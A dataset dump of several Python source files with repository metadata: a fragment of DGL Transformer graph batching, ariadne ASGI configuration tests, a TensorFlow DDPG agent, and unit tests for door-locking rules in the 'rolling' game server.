n_edges += n_dd
g.set_n_initializer(dgl.init.zero_initializer)
g.set_e_initializer(dgl.init.zero_initializer)
return Graph(g=g,
src=(th.cat(src), th.cat(src_pos)),
tgt=(th.cat(tgt), th.cat(tgt_pos)),
tgt_y=None,
nids = {'enc': th.cat(enc_ids), 'dec': th.cat(dec_ids)},
eids = {'ee': th.cat(e2e_eids), 'ed': th.cat(e2d_eids), 'dd': th.cat(d2d_eids)},
nid_arr = {'enc': enc_ids, 'dec': dec_ids},
n_nodes=n_nodes,
n_edges=n_edges,
layer_eids={
'dep': [
th.tensor(layer_eids['dep'][i]) for i in range(0, len(layer_eids['dep']))
]
},
n_tokens=n_tokens)
def __call__(self, src_buf, tgt_buf, device='cpu', src_deps=None):
'''
Return a batched graph for the training phase of Transformer.
args:
src_buf: a set of input sequence arrays.
tgt_buf: a set of output sequence arrays.
device: 'cpu' or 'cuda:*'
src_deps: list, optional
Dependency parses of the source in the form of src_node_id -> dst_node_id.
where src is the child and dst is the parent. i.e a child node attends on its
syntactic parent in a dependency parse
'''
if src_deps is None:
src_deps = list()
g_list = []
src_lens = [len(_) for _ in src_buf]
tgt_lens = [len(_) - 1 for _ in tgt_buf]
num_edges = {'ee': [], 'ed': [], 'dd': []}
# We are running over source and target pairs here
for src_len, tgt_len in zip(src_lens, tgt_lens):
i, j = src_len - 1, tgt_len - 1
g_list.append(self.g_pool[i][j])
for key in ['ee', 'ed', 'dd']:
num_edges[key].append(int(self.num_edges[key][i][j]))
g = dgl.batch(g_list)
src, tgt, tgt_y = [], [], []
src_pos, tgt_pos = [], []
enc_ids, dec_ids = [], []
e2e_eids, d2d_eids, e2d_eids = [], [], []
layer_eids = {
'dep': [[], []]
}
n_nodes, n_edges, n_tokens = 0, 0, 0
for src_sample, tgt_sample, src_dep, n, m, n_ee, n_ed, n_dd in zip(src_buf, tgt_buf, src_deps, src_lens, tgt_lens, num_edges['ee'], num_edges['ed'], num_edges['dd']):
src.append(th.tensor(src_sample, dtype=th.long, device=device))
tgt.append(th.tensor(tgt_sample[:-1], dtype=th.long, device=device))
tgt_y.append(th.tensor(tgt_sample[1:], dtype=th.long, device=device))
src_pos.append(th.arange(n, dtype=th.long, device=device))
tgt_pos.append(th.arange(m, dtype=th.long, device=device))
enc_ids.append(th.arange(n_nodes, n_nodes + n, dtype=th.long, device=device))
n_nodes += n
dec_ids.append(th.arange(n_nodes, n_nodes + m, dtype=th.long, device=device))
n_nodes += m
e2e_eids.append(th.arange(n_edges, n_edges + n_ee, dtype=th.long, device=device))
# Copy the ids of edges that correspond to a given node and its previous N nodes
# We are using arange here. This will not work. Instead we need to select edges that
# correspond to previous positions. This information is present in graph pool
# For each edge, we need to figure out source_node_id and target_node_id.
if src_dep:
for i in range(0, 2):
for src_node_id, dst_node_id in dedupe_tuples(get_src_dst_deps(src_dep, i + 1)):
layer_eids['dep'][i].append(n_edges + src_node_id * n + dst_node_id)
layer_eids['dep'][i].append(n_edges + dst_node_id * n + src_node_id)
n_edges += n_ee
e2d_eids.append(th.arange(n_edges, n_edges + n_ed, dtype=th.long, device=device))
n_edges += n_ed
d2d_eids.append(th.arange(n_edges, n_edges + n_dd, dtype=th.long, device=device))
n_edges += n_dd
n_tokens += m
g.set_n_initializer(dgl.init.zero_initializer)
g.set_e_initializer(dgl.init.zero_initializer)
return Graph(g=g,
src=(th.cat(src), th.cat(src_pos)),
tgt=(th.cat(tgt), th.cat(tgt_pos)),
tgt_y=th.cat(tgt_y),
nids = {'enc': th.cat(enc_ids), 'dec': th.cat(dec_ids)},
eids = {'ee': th.cat(e2e_eids), 'ed': th.cat(e2d_eids), 'dd': th.cat(d2d_eids)},
nid_arr = {'enc': enc_ids, 'dec': dec_ids},
n_nodes=n_nodes,
layer_eids={
'dep': [
th.tensor(layer_eids['dep'][i]) for i in range(0, len(layer_eids['dep']))
]
},
n_edges=n_edges,
n_tokens=n_tokens)
| 44.638132
| 174
| 0.539139
| 10,140
| 0.883891
| 0
| 0
| 0
| 0
| 0
| 0
| 2,363
| 0.20598
|
b189f5ce6dc38c0cbcc1102caf8a791a932e5870
| 12,747
|
py
|
Python
|
tests/asgi/test_configuration.py
|
mrmilu/ariadne
|
cba577bd4befd16e0ec22701a5ac68f719661a9a
|
[
"BSD-3-Clause"
] | 1
|
2020-05-28T01:48:58.000Z
|
2020-05-28T01:48:58.000Z
|
tests/asgi/test_configuration.py
|
mrmilu/ariadne
|
cba577bd4befd16e0ec22701a5ac68f719661a9a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/asgi/test_configuration.py
|
mrmilu/ariadne
|
cba577bd4befd16e0ec22701a5ac68f719661a9a
|
[
"BSD-3-Clause"
] | null | null | null |
# pylint: disable=not-context-manager
from unittest.mock import ANY, Mock
from starlette.testclient import TestClient
from ariadne.asgi import (
GQL_CONNECTION_ACK,
GQL_CONNECTION_INIT,
GQL_DATA,
GQL_ERROR,
GQL_START,
GraphQL,
)
from ariadne.types import Extension
def test_custom_context_value_is_passed_to_resolvers(schema):
app = GraphQL(schema, context_value={"test": "TEST-CONTEXT"})
client = TestClient(app)
response = client.post("/", json={"query": "{ testContext }"})
assert response.json() == {"data": {"testContext": "TEST-CONTEXT"}}
def test_custom_context_value_function_is_set_and_called_by_app(schema):
get_context_value = Mock(return_value=True)
app = GraphQL(schema, context_value=get_context_value)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_context_value.assert_called_once()
def test_custom_context_value_function_result_is_passed_to_resolvers(schema):
get_context_value = Mock(return_value={"test": "TEST-CONTEXT"})
app = GraphQL(schema, context_value=get_context_value)
client = TestClient(app)
response = client.post("/", json={"query": "{ testContext }"})
assert response.json() == {"data": {"testContext": "TEST-CONTEXT"}}
def test_async_context_value_function_result_is_awaited_before_passing_to_resolvers(
schema,
):
async def get_context_value(*_):
return {"test": "TEST-ASYNC-CONTEXT"}
app = GraphQL(schema, context_value=get_context_value)
client = TestClient(app)
response = client.post("/", json={"query": "{ testContext }"})
assert response.json() == {"data": {"testContext": "TEST-ASYNC-CONTEXT"}}
def test_custom_root_value_is_passed_to_query_resolvers(schema):
app = GraphQL(schema, root_value={"test": "TEST-ROOT"})
client = TestClient(app)
response = client.post("/", json={"query": "{ testRoot }"})
assert response.json() == {"data": {"testRoot": "TEST-ROOT"}}
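# The subscription tests below drive the graphql-ws handshake: the client
# sends GQL_CONNECTION_INIT, the server replies with GQL_CONNECTION_ACK, the
# client then sends GQL_START with a query payload, and results arrive as
# GQL_DATA messages.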
def test_custom_root_value_is_passed_to_subscription_resolvers(schema):
app = GraphQL(schema, root_value={"test": "TEST-ROOT"})
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { testRoot }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
assert response["payload"] == {"data": {"testRoot": "TEST-ROOT"}}
def test_custom_root_value_function_is_called_by_query(schema):
get_root_value = Mock(return_value=True)
app = GraphQL(schema, root_value=get_root_value)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_root_value.assert_called_once()
def test_custom_root_value_function_is_called_by_subscription(schema):
get_root_value = Mock(return_value=True)
app = GraphQL(schema, root_value=get_root_value)
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { ping }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
get_root_value.assert_called_once()
def test_custom_root_value_function_is_called_with_context_value(schema):
get_root_value = Mock(return_value=True)
app = GraphQL(
schema, context_value={"test": "TEST-CONTEXT"}, root_value=get_root_value
)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_root_value.assert_called_once_with({"test": "TEST-CONTEXT"}, ANY)
def test_custom_validation_rule_is_called_by_query_validation(schema, validation_rule):
app = GraphQL(schema, validation_rules=[validation_rule])
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
validation_rule.assert_called_once()
def test_custom_validation_rules_function_is_set_and_called_on_query_execution(
schema, validation_rule
):
get_validation_rules = Mock(return_value=[validation_rule])
app = GraphQL(schema, validation_rules=get_validation_rules)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_validation_rules.assert_called_once()
validation_rule.assert_called_once()
def test_custom_validation_rules_function_is_called_with_context_value(
schema, validation_rule
):
get_validation_rules = Mock(return_value=[validation_rule])
app = GraphQL(
schema,
context_value={"test": "TEST-CONTEXT"},
validation_rules=get_validation_rules,
)
client = TestClient(app)
client.post("/", json={"query": "{ status }"})
get_validation_rules.assert_called_once_with({"test": "TEST-CONTEXT"}, ANY, ANY)
def execute_failing_query(app):
client = TestClient(app)
client.post("/", json={"query": "{ error }"})
def test_default_logger_is_used_to_log_error_if_custom_is_not_set(schema, mocker):
logging_mock = mocker.patch("ariadne.logger.logging")
app = GraphQL(schema)
execute_failing_query(app)
logging_mock.getLogger.assert_called_once_with("ariadne")
def test_custom_logger_is_used_to_log_query_error(schema, mocker):
logging_mock = mocker.patch("ariadne.logger.logging")
app = GraphQL(schema, logger="custom")
execute_failing_query(app)
logging_mock.getLogger.assert_called_once_with("custom")
def test_custom_logger_is_used_to_log_subscription_source_error(schema, mocker):
logging_mock = mocker.patch("ariadne.logger.logging")
app = GraphQL(schema, logger="custom")
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { sourceError }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
logging_mock.getLogger.assert_called_once_with("custom")
def test_custom_logger_is_used_to_log_subscription_resolver_error(schema, mocker):
logging_mock = mocker.patch("ariadne.logger.logging")
app = GraphQL(schema, logger="custom")
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { resolverError }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
logging_mock.getLogger.assert_called_once_with("custom")
def test_custom_error_formatter_is_used_to_format_query_error(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, error_formatter=error_formatter)
execute_failing_query(app)
error_formatter.assert_called_once()
def test_custom_error_formatter_is_used_to_format_subscription_syntax_error(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, error_formatter=error_formatter)
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{"type": GQL_START, "id": "test1", "payload": {"query": "subscription {"}}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_ERROR
assert response["id"] == "test1"
error_formatter.assert_called_once()
def test_custom_error_formatter_is_used_to_format_subscription_source_error(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, error_formatter=error_formatter)
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { sourceError }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
assert response["id"] == "test1"
error_formatter.assert_called_once()
def test_custom_error_formatter_is_used_to_format_subscription_resolver_error(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, error_formatter=error_formatter)
client = TestClient(app)
with client.websocket_connect("/", "graphql-ws") as ws:
ws.send_json({"type": GQL_CONNECTION_INIT})
ws.send_json(
{
"type": GQL_START,
"id": "test1",
"payload": {"query": "subscription { resolverError }"},
}
)
response = ws.receive_json()
assert response["type"] == GQL_CONNECTION_ACK
response = ws.receive_json()
assert response["type"] == GQL_DATA
assert response["id"] == "test1"
error_formatter.assert_called_once()
def test_error_formatter_is_called_with_debug_enabled(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, debug=True, error_formatter=error_formatter)
execute_failing_query(app)
error_formatter.assert_called_once_with(ANY, True)
def test_error_formatter_is_called_with_debug_disabled(schema):
error_formatter = Mock(return_value=True)
app = GraphQL(schema, debug=False, error_formatter=error_formatter)
execute_failing_query(app)
error_formatter.assert_called_once_with(ANY, False)
class CustomExtension(Extension):
async def resolve(self, next_, parent, info, **kwargs):
return next_(parent, info, **kwargs).lower()
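# CustomExtension lower-cases every resolved value, so the tests below can
# verify that the extension actually ran in the resolver chain
# ("Hello, BOB!" becomes "hello, bob!").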
def test_extension_from_option_are_passed_to_query_executor(schema):
app = GraphQL(schema, extensions=[CustomExtension])
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "hello, bob!"}}
def test_extensions_function_result_is_passed_to_query_executor(schema):
def get_extensions(*_):
return [CustomExtension]
app = GraphQL(schema, extensions=get_extensions)
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "hello, bob!"}}
def test_async_extensions_function_result_is_passed_to_query_executor(schema):
async def get_extensions(*_):
return [CustomExtension]
app = GraphQL(schema, extensions=get_extensions)
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "hello, bob!"}}
def middleware(next_fn, *args, **kwargs):
value = next_fn(*args, **kwargs)
return f"**{value}**"
def test_middlewares_are_passed_to_query_executor(schema):
app = GraphQL(schema, middleware=[middleware])
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "**Hello, BOB!**"}}
def test_middleware_function_result_is_passed_to_query_executor(schema):
def get_middleware(*_):
return [middleware]
app = GraphQL(schema, middleware=get_middleware)
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "**Hello, BOB!**"}}
def test_async_middleware_function_result_is_passed_to_query_executor(schema):
async def get_middleware(*_):
return [middleware]
app = GraphQL(schema, middleware=get_middleware)
client = TestClient(app)
response = client.post("/", json={"query": '{ hello(name: "BOB") }'})
assert response.json() == {"data": {"hello": "**Hello, BOB!**"}}
| 36.524355
| 87
| 0.672394
| 146
| 0.011454
| 0
| 0
| 0
| 0
| 305
| 0.023927
| 1,867
| 0.146466
|
b18afbecdd582dccbd726f5d982378f6fc6adc50
| 7,056
|
py
|
Python
|
OpenAI-Gym/agents/ddpg.py
|
stmobo/Machine-Learning
|
83f69c7afb0a4bc1dc94482b8d23805e8ab2acde
|
[
"MIT"
] | 2
|
2017-09-26T04:39:04.000Z
|
2017-10-12T08:57:51.000Z
|
OpenAI-Gym/agents/ddpg.py
|
stmobo/Machine-Learning
|
83f69c7afb0a4bc1dc94482b8d23805e8ab2acde
|
[
"MIT"
] | null | null | null |
OpenAI-Gym/agents/ddpg.py
|
stmobo/Machine-Learning
|
83f69c7afb0a4bc1dc94482b8d23805e8ab2acde
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
import random
from collections import deque
from agents import mixed_network, spaces, replay_buffer
tensorType = tf.float32
"""
Implements a Deep Deterministic Policy Gradient agent.
Adjustable parameters:
- Actor / Critic learning rates
- Temporal Difference discount factor
- Experience Replay buffer / batch sizes
"""
class DDPGAgent:
"""
Creates a new DDPG agent.
Args:
- actorGen and criticGen should be functions that create new
neural networks with supplied Placeholder input Tensors.
- state_shape will be the shape of the state input Placeholder.
- action_shape should be the shape of the tensors output by the
actor neural network.
- buf_sz is the size of the agent's internal experience replay buffer.
- batch_sz will be the size of each training batch (drawn from the replay buffer)
"""
def __init__(self, actorGen, criticGen, state_shape, action_shape, buf_sz=100000,
batch_sz=64, critic_learning_rate=0.001, actor_learning_rate=0.0001,
discount_factor=0.99, actor_mix_factor=0.001,
critic_mix_factor=0.001, actor_gradient_clipping=None, critic_gradient_clipping=None):
self.graph = tf.Graph()
self.session = tf.Session(graph=self.graph)
self.discount_factor = discount_factor
self.replay_buf = deque(maxlen=buf_sz)
self.batch_size = batch_sz
self.state_shape = state_shape
self.action_shape = action_shape
self.__single_state_shape = self.state_shape[:]
self.__single_state_shape[0] = 1
with self.graph.as_default():
self.state_in = tf.placeholder(tensorType, state_shape, name='state-in')
self.action_in = tf.placeholder(tensorType, action_shape, name='action-in')
with tf.variable_scope('critic'):
self.critic = mixed_network.MixedNetwork(self.graph, self.session,
                    tf.concat([self.state_in, self.action_in], axis=1),  # tf.concat_v2 was renamed to tf.concat in TF 1.0
criticGen, target_mix_factor=critic_mix_factor,
prefix='critic/')
self.critic_prediction = tf.placeholder(tensorType, [None])
self.critic_loss = tf.reduce_mean( tf.square( self.critic_prediction - tf.squeeze(self.critic.main_out) ) )
critic_optimizer = tf.train.AdamOptimizer(critic_learning_rate)
if isinstance(critic_gradient_clipping, tuple):
critic_gradients = critic_optimizer.compute_gradients(self.critic_loss, self.critic.main_parameters)
clipped_grads = [ \
( tf.clip_by_value(gv[0], critic_gradient_clipping[0], critic_gradient_clipping[1]), gv[1]) \
for gv in critic_gradients ]
self.critic_optimize = critic_optimizer.apply_gradients(clipped_grads)
else:
self.critic_optimize = critic_optimizer.minimize(self.critic_loss, var_list=self.critic.main_parameters)
# gradient of the critic network w.r.t. the actions, averaged over all (s,a) pairs in batch
self.action_gradient = tf.div(tf.gradients(self.critic.main_out, self.action_in), tf.constant(self.batch_size, tensorType))
with tf.variable_scope('actor'):
self.actor = mixed_network.MixedNetwork(self.graph,
self.session, self.state_in, actorGen, prefix='actor/',
target_mix_factor=actor_mix_factor)
#self.aGrad_pl = tf.placeholder(tensorType, action_shape, name='action-gradient-placeholder')
self.actor_gradients = tf.gradients(self.actor.main_out, self.actor.main_parameters, self.action_gradient)
#self.actor_optimize = [p.assign(p + actor_learning_rate*g) \
#for p, g in zip(self.actor.main_parameters, self.actor_gradients)]
#self.actor_optimize = tf.train.GradientDescentOptimizer(actor_learning_rate).apply_gradients(
# zip(self.actor_gradients, self.actor.main_parameters)
#)
if isinstance(actor_gradient_clipping, tuple):
self.actor_gradients = [tf.clip_by_value(g, actor_gradient_clipping[0], actor_gradient_clipping[1]) for g in self.actor_gradients]
self.actor_gradients = [tf.negative(g) for g in self.actor_gradients]
self.actor_optimize = tf.train.AdamOptimizer(actor_learning_rate).apply_gradients(
zip(self.actor_gradients, self.actor.main_parameters)
)
self.session.run(tf.global_variables_initializer())
def act(self, observation):
return self.actor.get_main({ self.state_in: np.reshape(observation, self.__single_state_shape)})
def add_experience(self, state, action, reward, done, next_state):
self.replay_buf.append( (state, action, reward, done, next_state) )
def train(self):
sm = random.sample(self.replay_buf, min(len(self.replay_buf), self.batch_size))
state_shape = self.state_shape[:]
action_shape = self.action_shape[:]
state_shape[0] = action_shape[0] = len(sm)
states = np.reshape([ ts[0] for ts in sm ], state_shape)
actions = np.reshape([ ts[1] for ts in sm ], action_shape)
rewards = np.reshape([ ts[2] for ts in sm ], [len(sm)])
term_state = np.reshape([ ts[3] for ts in sm ], [len(sm)])
next_states = np.reshape([ ts[4] for ts in sm ], state_shape)
# Use target actor and critic networks to estimate TD targets
target_a = np.reshape(self.actor.get_target({self.state_in:next_states}), action_shape)
target_q = np.reshape(self.critic.get_target({ self.state_in:next_states, self.action_in:target_a }), [len(sm)])
td_targets = []
for i, t in enumerate(target_q):
if term_state[i]:
td_targets.append(rewards[i])
else:
td_targets.append(rewards[i] + (self.discount_factor * t))
_, crit_loss, predicted_q = self.session.run([self.critic_optimize, self.critic_loss, self.critic.main_out], {
self.state_in: states,
self.action_in: actions,
self.critic_prediction: np.squeeze(td_targets)
})
net_actions = np.reshape(self.actor.get_main({self.state_in: states}), action_shape)
self.session.run(self.actor_optimize, {self.state_in:states, self.action_in:net_actions})
#self.session.run(self.actor_optimize, {self.state_in:states, self.action_in:actions})
#actor_grad = self.session.run(self.actor_gradients, {self.state_in:states, self.action_in:net_actions})[0]
#assert not np.isnan(np.sum(actor_grad))
return np.squeeze(predicted_q), crit_loss
def update_targets(self):
self.actor.update_target()
self.critic.update_target()
| 45.230769
| 150
| 0.658872
| 6,635
| 0.940334
| 0
| 0
| 0
| 0
| 0
| 0
| 1,514
| 0.214569
|
b18b42a0184f3b3519a30ad5c379fbaef6c9cbc7
| 14,426
|
py
|
Python
|
tests/unit/test_door.py
|
buxx/rolling
|
ef1268fe6ddabe768a125c3ce8b37e0b9cbad4a5
|
[
"MIT"
] | 14
|
2019-11-16T18:51:51.000Z
|
2022-01-15T17:50:34.000Z
|
tests/unit/test_door.py
|
buxx/rolling
|
ef1268fe6ddabe768a125c3ce8b37e0b9cbad4a5
|
[
"MIT"
] | 148
|
2018-12-10T09:07:45.000Z
|
2022-03-08T10:51:04.000Z
|
tests/unit/test_door.py
|
buxx/rolling
|
ef1268fe6ddabe768a125c3ce8b37e0b9cbad4a5
|
[
"MIT"
] | 1
|
2020-08-05T14:25:48.000Z
|
2020-08-05T14:25:48.000Z
|
from aiohttp.test_utils import TestClient
import pytest
import typing
import unittest.mock
from rolling.kernel import Kernel
from rolling.model.character import CharacterModel
from rolling.model.character import MINIMUM_BEFORE_EXHAUSTED
from rolling.server.document.affinity import AffinityDirectionType
from rolling.server.document.affinity import AffinityJoinType
from rolling.server.document.affinity import CHIEF_STATUS
from rolling.server.document.affinity import MEMBER_STATUS
from rolling.server.document.build import BuildDocument
from rolling.server.document.build import DOOR_MODE_LABELS
from rolling.server.document.build import DOOR_MODE__CLOSED
from rolling.server.document.build import DOOR_MODE__CLOSED_EXCEPT_FOR
from rolling.server.document.build import DoorDocument
@pytest.fixture
def websocket_prepare_mock() -> typing.Generator[unittest.mock.AsyncMock, None, None]:
with unittest.mock.patch("aiohttp.web_ws.WebSocketResponse.prepare") as mock_:
yield mock_
@pytest.fixture
def zone_event_manager_listen_mock() -> typing.Generator[
unittest.mock.AsyncMock, None, None
]:
with unittest.mock.patch(
"rolling.server.zone.websocket.ZoneEventsManager._listen"
) as mock_:
yield mock_
@pytest.fixture
def zone_event_manager_close_mock() -> typing.Generator[
unittest.mock.AsyncMock, None, None
]:
with unittest.mock.patch(
"rolling.server.zone.websocket.ZoneEventsManager.close_websocket"
) as mock_:
yield mock_
@pytest.fixture
def socket_send_str_mock() -> typing.Generator[unittest.mock.AsyncMock, None, None]:
with unittest.mock.patch("aiohttp.web_ws.WebSocketResponse.send_str") as mock_:
yield mock_
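# The fixtures above patch the aiohttp websocket plumbing, so the tests below
# can assert on emitted zone events without opening real network connections.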
class TestDoor:
def _place_door(self, kernel: Kernel) -> DoorDocument:
build = kernel.build_lib.place_build(
world_row_i=1,
world_col_i=1,
zone_row_i=10,
zone_col_i=10,
build_id="DOOR",
under_construction=False,
)
return build
def _create_rule(
self,
kernel: Kernel,
author: CharacterModel,
door: BuildDocument,
mode: str,
affinity_ids: typing.Optional[typing.List[int]],
) -> None:
kernel.door_lib.update(
character_id=author.id,
build_id=door.id,
new_mode=mode,
new_affinity_ids=affinity_ids,
)
def test_one_rule_lock__author_here__stranger_cant(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
def test_one_rule_lock_except__author_here__stranger_cant_but_member_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_franck_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
franck = worldmapc_franck_model
# Given
aff = kernel.affinity_lib.create(
name="aff1",
join_type=AffinityJoinType.ACCEPT_ALL,
direction_type=AffinityDirectionType.ONE_DIRECTOR,
)
kernel.affinity_lib.join(
character_id=xena.id,
affinity_id=aff.id,
accepted=True,
request=False,
status_id=CHIEF_STATUS[0],
)
kernel.affinity_lib.join(
character_id=franck.id,
affinity_id=aff.id,
accepted=True,
request=False,
status_id=MEMBER_STATUS[0],
)
door = self._place_door(kernel)
self._create_rule(
kernel,
author=xena,
door=door,
mode=DOOR_MODE__CLOSED_EXCEPT_FOR,
affinity_ids=[aff.id],
)
# When
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=franck.id
)
def test_two_rule_lock__author_here_and_first_can__stranger_second_cant(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
self._create_rule(
kernel, author=arthur, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
async def test_two_rule_lock__author_first_travel__stranger_second_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
self._create_rule(
kernel, author=arthur, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When/Then 1
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
await kernel.character_lib.move(
character=xena,
to_world_row=2,
to_world_col=2,
)
# When/Then 2
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
await kernel.character_lib.move(
character=xena,
to_world_row=1,
to_world_col=1,
)
# When/Then 3
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
async def test_one_rule_lock__author_first_travel__stranger_second_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When/Then 1
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
await kernel.character_lib.move(
character=xena,
to_world_row=2,
to_world_col=2,
)
# When/Then 2
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
await kernel.character_lib.move(
character=xena,
to_world_row=1,
to_world_col=1,
)
# When/Then 3
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
async def test_one_rule_lock__author_dead__stranger_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When/Then 1
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
kernel.character_lib.kill(character_id=xena.id)
# When/Then 2
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
async def test_one_rule_lock__author_vulnerable__stranger_can(
self,
worldmapc_xena_model: CharacterModel,
worldmapc_arthur_model: CharacterModel,
worldmapc_kernel: Kernel,
) -> None:
kernel = worldmapc_kernel
xena = worldmapc_xena_model
arthur = worldmapc_arthur_model
# Given
door = self._place_door(kernel)
self._create_rule(
kernel, author=xena, door=door, mode=DOOR_MODE__CLOSED, affinity_ids=[]
)
# When/Then 1
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=xena.id
)
assert kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
# Given 2
xena_doc = kernel.character_lib.get_document(xena.id)
xena_doc.tiredness = MINIMUM_BEFORE_EXHAUSTED + 1
kernel.server_db_session.add(xena_doc)
kernel.server_db_session.commit()
xena = kernel.character_lib.get(id_=xena.id)
assert xena.vulnerable
# When/Then 2
assert not kernel.door_lib.is_access_locked_for(
build_id=door.id, character_id=arthur.id
)
